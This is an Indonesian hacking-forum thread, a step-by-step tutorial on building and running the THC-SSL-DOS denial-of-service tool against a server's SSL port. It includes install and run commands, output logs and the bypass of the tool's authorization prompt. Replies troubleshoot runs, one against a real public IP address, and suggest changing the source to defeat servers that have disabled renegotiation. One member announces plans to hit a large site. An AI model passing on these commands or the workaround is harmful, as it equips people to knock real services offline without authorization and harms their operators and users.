SSL DoS by THC

**riv182** · 02-11-2012, 03:10 PM

(10-25-2011, 04:05 PM)konspirasi Wrote: Setelah jalan-jalan disini, ternyata ada DoS tipe yg ane baru tau yaitu dengan memanfaatkan protokol SSL yang dibuat oleh The Hacker's Choice.

Download aja langsung sourcenya:
Bagi pengguna Unix/Linux disini
Bagi pengguna Windows disini

1. Cara menggunakan di Unix/Linux:
EDITED: (ane baru coba setelah pulang kantor )
ekstrak dulu filenya dengan
Code:
tar xvf thc-ssl-dos-1.4.tar.gz

lalu masuk ke folder /thc-ssl-dos-1.4.tar.gz

lakukan

Code:
./configure

klo ada error
Quote:configure: error: libcrypto not found part of openssl.
berarti harus install libssl-dev
Code:
apt-get install libssl-dev

trus

Code:
make all install

jalaninnya:

Code:
./thc-ssl-dos masuk.in.ip.target 443

klo ada error:

Quote:ERROR:
Please agree by using '--accept' option that the IP is a legitimate target
and that you are fully authorized to perform the test against this target.

ini semacam agreement antara kita dengan pembuat aplikasi, tambahin --accept aja di line diatas

Code:
./thc-ssl-dos masuk.in.ip.target 443 --accept

jika sudah jalan akan muncul seperti dibawah:

Quote:root@iKONs:~/Programs/thc-ssl-dos-1.4/src# thc-ssl-dos masuk.in.ip.target 443 --accept
______________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/
http://www.thc.org

Twitter @hackerschoice

Greetingz: the french underground

Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 45 [45.39 h/s], 14 Conn, 0 Err
Handshakes 111 [66.31 h/s], 14 Conn, 0 Err
Handshakes 177 [66.50 h/s], 14 Conn, 0 Err
Handshakes 246 [68.77 h/s], 16 Conn, 0 Err
Handshakes 310 [64.02 h/s], 17 Conn, 0 Err
Handshakes 380 [70.01 h/s], 17 Conn, 0 Err
Handshakes 447 [67.14 h/s], 17 Conn, 0 Err
Handshakes 499 [51.92 h/s], 18 Conn, 0 Err
Handshakes 565 [66.16 h/s], 18 Conn, 0 Err
Handshakes 631 [65.66 h/s], 18 Conn, 0 Err
Handshakes 694 [62.98 h/s], 19 Conn, 0 Err
Handshakes 761 [67.30 h/s], 19 Conn, 0 Err
Handshakes 823 [61.69 h/s], 19 Conn, 0 Err
Handshakes 886 [62.96 h/s], 20 Conn, 0 Err

perhatikan yg warna merah diatas, berarti yg ane lakukan sekitar 60-70 koneksi per detik terhadap server, normalnya sebuah server dapat melakukan sampai 300 koneksi SSL
sehingga dapat disimpulkan serangan DoS yang ane lakukan tidak berhasil membuat server down
berarti paling ngga ada 5 komputer dengan tools ini utk menjatuhkan suatu server...cmiiw

2. Cara menggunakan di Windows:
ekstrak aja file thc-ssl-dos-1.4-win-bin.zip pake winrar/winzip/7zip dsb
buka cmd, masuk ke folder hasil ekstrak diatas, lalu:

Quote:C:\Downloads\Compressed\thc-ssl-dos>thc-ssl-dos.exe -h
______________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/
http://www.thc.org

Twitter @hackerschoice

Greetingz: the french underground

./thc-ssl-dos [options] <ip> <port>
-h help
-l <n> Limit parallel connections [default: 400]

jalaninnya:

Code:
thc-ssl-dos.exe -l 400 masuk.in.ip.target 443

Untuk lebih jelasnya bisa lihat ke website THC disini.

UPDATE!
klo ada error seperti ini:
1.

Quote:thc-ssl-dos-1.4> src/thc-ssl-dos [target_ip] 443 --accept
______________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/

http://www.thc.org

Twitter @hackerschoice

Greetingz: the french underground

Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 0 [0.00 h/s], 181 Conn, 0 Err
Handshakes 0 [0.00 h/s], 181 Conn, 0 Err
Handshakes 0 [0.00 h/s], 181 Conn, 0 Err
Handshakes 0 [0.00 h/s], 231 Conn, 0 Err
Handshakes 0 [0.00 h/s], 231 Conn, 0 Err
Handshakes 0 [0.00 h/s], 231 Conn, 0 Err
Handshakes 0 [0.00 h/s], 231 Conn, 0 Err
Handshakes 0 [0.00 h/s], 231 Conn, 0 Err
Handshakes 0 [0.00 h/s], 231 Conn, 0 Err
Handshakes 0 [0.00 h/s], 231 Conn, 0 Err
Handshakes 0 [0.00 h/s], 231 Conn, 0 Err
Handshakes 0 [0.00 h/s], 231 Conn, 0 Err
Handshakes 0 [0.00 h/s], 233 Conn, 0 Err
Handshakes 0 [0.00 h/s], 233 Conn, 0 Err
Handshakes 0 [0.00 h/s], 233 Conn, 0 Err
Handshakes 0 [0.00 h/s], 233 Conn, 0 Err
Handshakes 0 [0.00 h/s], 233 Conn, 0 Err
Handshakes 0 [0.00 h/s], 233 Conn, 0 Err
Handshakes 0 [0.00 h/s], 233 Conn, 0 Err
Handshakes 0 [0.00 h/s], 233 Conn, 0 Err
Handshakes 0 [0.00 h/s], 233 Conn, 0 Err
ERROR: Target has disabled renegotiations.
Use your own skills to modify the source to test/attack
the target [hint: TCP reconnect for every handshake].

berarti SSL Renegotiation pada server telah di blokir sehingga tidak vulnerable terhadap serangan ini.

2.

Quote:thc-ssl-dos-1.4> src/thc-ssl-dos [target_ip] 443 --accept
______________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/

http://www.thc.org

Twitter @hackerschoice

Greetingz: the french underground

Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
SSL: error:00000000:lib(0):func(0):reason(0)
SSL: error:00000000:lib(0):func(0):reason(0)
SSL: error:00000000:lib(0):func(0):reason(0)
SSL: error:00000000:lib(0):func(0):reason(0)
SSL: error:00000000:lib(0):func(0):reason(0)

berarti SSL di server tersebut telah di patch dengan set "Connection soft Limit" dan "Connection hard limit" di "Server"->"Security"->"Per client throttling", di set soft limit to 20 dan hard limit to 30.

Note:
- masukin IP target, klo menggunakan URL ane coba ga bisa
- disini kita hanya bertukar ilmu, penggunaan tools ini merupakan tanggung jawab masing-masing

semoga bermanfaat
M

thanks om turtornya ijin copas and dicoba om... Big Grin

**gnome_selpa** · 05-23-2012, 10:37 AM

om...
ane kagak bisa2 ya ??
di BT kan sudah ada nih thc-ssl-dos
tapi no directory gitu ??

**Al - Ayyubi** · 05-23-2012, 12:17 PM

ijin coba Om Smile

iKONspirasi · 05-23-2012, 07:26 PM

(05-23-2012, 10:37 AM)arneiz Wrote: om...
ane kagak bisa2 ya ??
di BT kan sudah ada nih thc-ssl-dos
tapi no directory gitu ??

BT5 R2 kan?

coba ketik thc-ssl-dos di konsole

**ekawithoutyou** · 05-23-2012, 07:33 PM

ni ane kasih stepnya

1. buka terminal cd /usr/sbin/
2. setelah itu ln -s /usr/local/bin/thc-ssl-dos
3. dan chmod +x thc-ssl-dos

nah kalo udah coba ketikan thc-ssl-dos di terminal Tongue

Code:
eka@mysuicidenotes{~}:thc-ssl-dos 

     ______________ ___  _________

     \__    ___/   |   \ \_   ___ \

       |    | /    ~    \/    \  \/

       |    | \    Y    /\     \____

       |____|  \___|_  /  \______  /

                     \/          \/

            http://www.thc.org

          Twitter @hackerschoice

Greetingz: the french underground

./thc-ssl-dos [options] <ip> <port>

  -h      help

  -l <n>  Limit parallel connections [default: 400]

**thecode1315** · 11-25-2012, 08:12 AM

ada muncul erorr gini 0m

root@bt:~/thc-ssl-dos# thc-ssl-dos 202.155.27.137 443 --accept
______________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/
http://www.thc.org

Twitter @hackerschoice

Greetingz: the french underground

Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 0 [0.00 h/s], 2 Conn, 0 Err
ERROR: Target has disabled renegotiations.
Use your own skills to modify the source to test/attack
the target [hint: TCP reconnect for every handshake].
root@bt:~/thc-ssl-dos#

beeehhh ngak tau lgi mau di apain in om, mhon pencerahannya

iKONspirasi · 11-27-2012, 03:41 AM

(11-25-2012, 08:12 AM)thecode1315 Wrote: ada muncul erorr gini 0m

root@bt:~/thc-ssl-dos# thc-ssl-dos 202.155.27.137 443 --accept
______________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/

Twitter @hackerschoice

Greetingz: the french underground

Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 0 [0.00 h/s], 2 Conn, 0 Err
ERROR: Target has disabled renegotiations.
Use your own skills to modify the source to test/attack
the target [hint: TCP reconnect for every handshake].
root@bt:~/thc-ssl-dos#

beeehhh ngak tau lgi mau di apain in om, mhon pencerahannya

baru download ya? sepertinya source code nya harus diubah tuh karena target utk ssl renegotiationsnya disable.
coba cari di source codenya yang berhubungan dengan TCP reconnect

**arafahcom** · 12-07-2012, 10:28 AM

Om , ini bermasalah di mana nya yah ?
Kok Error gini ?
[Image: nvbeaq.png]

**thecode1315** · 12-07-2012, 01:17 PM

(11-27-2012, 03:41 AM)konspirasi Wrote:
(11-25-2012, 08:12 AM)thecode1315 Wrote: ada muncul erorr gini 0m

root@bt:~/thc-ssl-dos# thc-ssl-dos 202.155.27.137 443 --accept
______________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/

Twitter @hackerschoice

Greetingz: the french underground

Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 0 [0.00 h/s], 2 Conn, 0 Err
ERROR: Target has disabled renegotiations.
Use your own skills to modify the source to test/attack
the target [hint: TCP reconnect for every handshake].
root@bt:~/thc-ssl-dos#

beeehhh ngak tau lgi mau di apain in om, mhon pencerahannya

baru download ya? sepertinya source code nya harus diubah tuh karena target utk ssl renegotiationsnya disable.
coba cari di source codenya yang berhubungan dengan TCP reconnect

om tlong kse pnjlsan yg lbih dong, ngak ngerti om Big Grin

mklum msi pengguna baru om Big Grin

**[H2]** · 12-07-2012, 01:31 PM

wiiihhh,,, keren om, cuma butuh 5 PC ya, ntar deh ane coba ama site gede =))